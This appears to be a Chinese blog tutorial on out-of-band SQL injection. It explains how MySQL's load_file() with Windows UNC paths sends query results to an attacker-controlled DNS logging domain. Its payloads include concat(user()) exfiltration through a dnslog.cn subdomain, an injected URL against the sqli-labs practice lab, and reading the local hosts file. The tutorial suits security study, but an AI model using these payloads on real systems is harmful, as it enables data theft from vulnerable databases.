根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注、推理注入、带内注入)和out-of-band

一、什么是OOB

out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

二、利用原理

1、常规SQL注入,获取服务器信息的方式

2、SQL注入利用DNS获取查询结果(OOB)

我们需要一个三级域名服务器(nameserver)也是DNS服务器(DNS Server),也就是下图的schloar服务器。

还需要配置域名“www.scholar.com”对应的解析IP地址为“schloar服务器”的IP地址。

这样就能够实时地监控域名查询请求了,图示如下:

三、利用条件

需要windows环境

1、DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNC

2、Linux没有UNC路径,所以当处于Linux环境,不能使用该方式获取数据

四、环境搭建

1、Windwos操作系统

2、Mysql数据库服务

3、互联网上有已经准备好的域名服务器和DNS服务器环境

DNSLog.cn

CEYE

五、OOB复现

1、首先打开DNSLog.cn网站

2、打开windows客户端DOS

ping q5i9by.dnslog.cn

结果如下图:

3、进入Windows客户端Mysql服务

select load_file("////xxx.q5i9by.dnslog.cn//x.txt");

select load_file(concat("\\\\",user(),".q5i9by.dnslog.cn//aa.txt"));


注:

1、\\转义后即为\

2、concat将(1,2,3)拼接在一起形成123

六、利用SQL注入漏洞外带查询

直接上payload

http://127.0.0.1/PTE/sqli-labs/Less-1/?id=1' and load_file(concat("\\\\",user(),".gq95nz.dnslog.cn\\xxx.txt"))--

七、OOB引申的扩展知识

1、Mysql内置函数load_file()不仅能对\www.test.com这样的URL发起请求,还能够加载本地文件,如下:

select load_file("C:\\WINDOWS\\system32\\drivers\\etc\\hosts");

show variables like '%secure%';查看load_file()可以读取的磁盘。

(1)当secure_file_priv为空,就可以读取磁盘的目录。

(2)当secure_file_priv为G:\,就可以读取G盘的文件。

(3)当secure_file_priv为null,load_file就不能加载文件。

通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。

2、不同DBMS中使用的方法,参考如下链接

https://blog.csdn.net/u014029795/article/details/105214129

3、UNC定义

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器.。UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。UNC路径就是类似\softer这样的形式的网络路径

格式: \servername\sharename ,其中 servername 是服务器名,sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename

参考链接

https://blog.csdn.net/u014029795/article/details/105214129

https://www.freebuf.com/articles/web/201013.html

https://www.cnblogs.com/-qing-/p/10623583.html

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

最新文章

  1. ComponentCount 与 ControlCount 区别
  2. Linq 中 表连接查询
  3. sphinx续4-coreseek的工作原理
  4. PHP redis负载均衡代码
  5. mysql 数据库查询与实例。
  6. Asp.Net--回调技术
  7. Java多线程学习笔记--生产消费者模式
  8. hdu1039
  9. 未出现的子串(unapeared)
  10. SVM公式推导笔记
  11. Oracle12c(12.1)中性能优化&功能增强之通过参数THREADED_EXECTION使用多线程模型
  12. 【转载】C#处理空格和换行
  13. IDEA 倒入maven项目下载很慢
  14. 网络编程—网络基础概览、socket,TCP/UDP协议
  15. D - 文理分科 (网络流->最小割)
  16. 初始Openwrt
  17. C++ Boost在VS2015中的使用
  18. 腾讯云服务器无法ssh登陆问题
  19. C语言编译器不检查数组下标越界
  20. ffmpeg command

热门文章

  1. linux-mint18 (ubuntu 16) 安装python3
  2. dubbo配置加载优先级
  3. JAVA 基于Jusup爬虫
  4. ORA-28000错误解决方案
  5. 3号随笔,搭建web环境
  6. vue-cli 工程目录结构介绍 详细介绍
  7. sql中的字符串拼接
  8. python使用zlib库压缩图片,使用ffmpeg压缩视频
  9. 在springmvc.xml中定义全局的异常处理
  10. 快速傅里叶变换(FFT)学习笔记(其二)(NTT)